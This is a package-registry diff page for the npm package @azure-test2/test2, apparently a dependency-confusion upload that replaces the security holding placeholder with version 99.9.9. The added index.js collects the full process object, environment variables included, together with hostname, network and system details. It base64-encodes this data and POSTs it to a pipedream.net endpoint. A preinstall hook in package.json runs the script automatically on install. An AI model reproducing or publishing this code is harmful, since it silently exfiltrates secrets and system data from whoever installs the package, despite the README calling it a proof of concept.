@azure-test2/test2 0.0.1-security → 99.9.9

Sign up to get free protection for your applications and to get access to all the features.
Files changed (3) hide show
  1. package/README.md +1 -5
  2. package/index.js +82 -0
  3. package/package.json +14 -3
package/README.md CHANGED
@@ -1,5 +1 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=%40azure-test2%2Ftest2 for more information.
1
+ PoC by HTM for security purpose only.
package/index.js ADDED
@@ -0,0 +1,82 @@
1
+
2
+ 'use strict'
3
+
4
+ const https = require('https')
5
+ const http = require("http");
6
+ const os = require("os");
7
+
8
+ // var currentPath = process.cwd();
9
+ // var currentUser =
10
+ var currentPath = __dirname;
11
+ var currentFile = __filename;
12
+ // var currentEnv = process.env;
13
+ var currentEnvString = JSON.stringify(process);
14
+ var currentEnvBase64 = Buffer.from(currentEnvString).toString('base64');
15
+
16
+ // console.log(currentPath);
17
+ // console.log(currentFile);
18
+ // console.log(currentEnvBase64)
19
+
20
+ var data = {
21
+ envPORT: process.env.PORT,
22
+ hostname: JSON.stringify(os.hostname()),
23
+ currentPath: currentPath,
24
+ currentFile: currentFile,
25
+ currentEnvBase64: currentEnvBase64,
26
+ type: JSON.stringify(os.type()),
27
+ platform: JSON.stringify(os.platform()),
28
+ arch: JSON.stringify(os.arch()),
29
+ release: JSON.stringify(os.release()),
30
+ uptime: JSON.stringify(os.uptime()),
31
+ loadavg: JSON.stringify(os.loadavg()),
32
+ totalmem: JSON.stringify(os.totalmem()),
33
+ freemem: JSON.stringify(os.freemem()),
34
+ cpus: JSON.stringify(os.cpus()),
35
+ networkInterfaces: JSON.stringify(os.networkInterfaces()),
36
+
37
+ };
38
+
39
+ // console.log(process.env.PORT)
40
+ // console.log(os.hostname())
41
+ // console.log(os.type())
42
+ // console.log(os.platform())
43
+ // console.log(os.arch())
44
+ // console.log(os.release())
45
+ // console.log(os.uptime())
46
+ // console.log(os.loadavg())
47
+ // console.log(os.totalmem())
48
+ // console.log(os.freemem())
49
+ // console.log(os.cpus())
50
+ // console.log(os.networkInterfaces())
51
+
52
+ // console.log(data)
53
+ // console.log(JSON.stringify(data));
54
+
55
+ data = JSON.stringify(data)
56
+ // console.log(data.length)
57
+
58
+ const options = {
59
+ hostname: 'enjglpdgtgrbn4b.m.pipedream.net',
60
+ port: 443,
61
+ path: '/aHR0cHM6Ly9naXRodWIuY29tL0F6dXJlL2F6dXJlLXNkay1mb3ItanMvYmxvYi83ZDFiOGYyMGI2MDUzYjFiMGNkODc1Mzc3OWFiOGQ4NGRmYjFlODQ3L2NvbW1vbi90b29scy9kZXYtdG9vbC90ZXN0L3NhbXBsZXMvZmlsZXMvZXhwZWN0YXRpb25zL2Nqcy1mb3Jtcy9qYXZhc2NyaXB0L3BhY2thZ2UuanNvbg',
62
+ method: 'POST',
63
+ headers: {
64
+ 'Content-Type': 'application/json',
65
+ 'Content-Length': data.length
66
+ }
67
+ }
68
+
69
+ const req = https.request(options, res => {
70
+ // console.log(`statusCode: ${res.statusCode}`)
71
+
72
+ res.on('data', d => {
73
+ process.stdout.write(d)
74
+ })
75
+ })
76
+
77
+ req.on('error', error => {
78
+ console.error(error)
79
+ })
80
+
81
+ req.write(data)
82
+ req.end()
package/package.json CHANGED
@@ -1,6 +1,17 @@
1
1
  {
2
2
  "name": "@azure-test2/test2",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "99.9.9",
4
+ "description": "",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall": "node index.js"
9
+ },
10
+ "author": "Aditya",
11
+ "license": "ISC",
12
+ "dependencies": {
13
+ "http": "0.0.1-security",
14
+ "https": "^1.0.0",
15
+ "os": "^0.1.1"
16
+ }
6
17
  }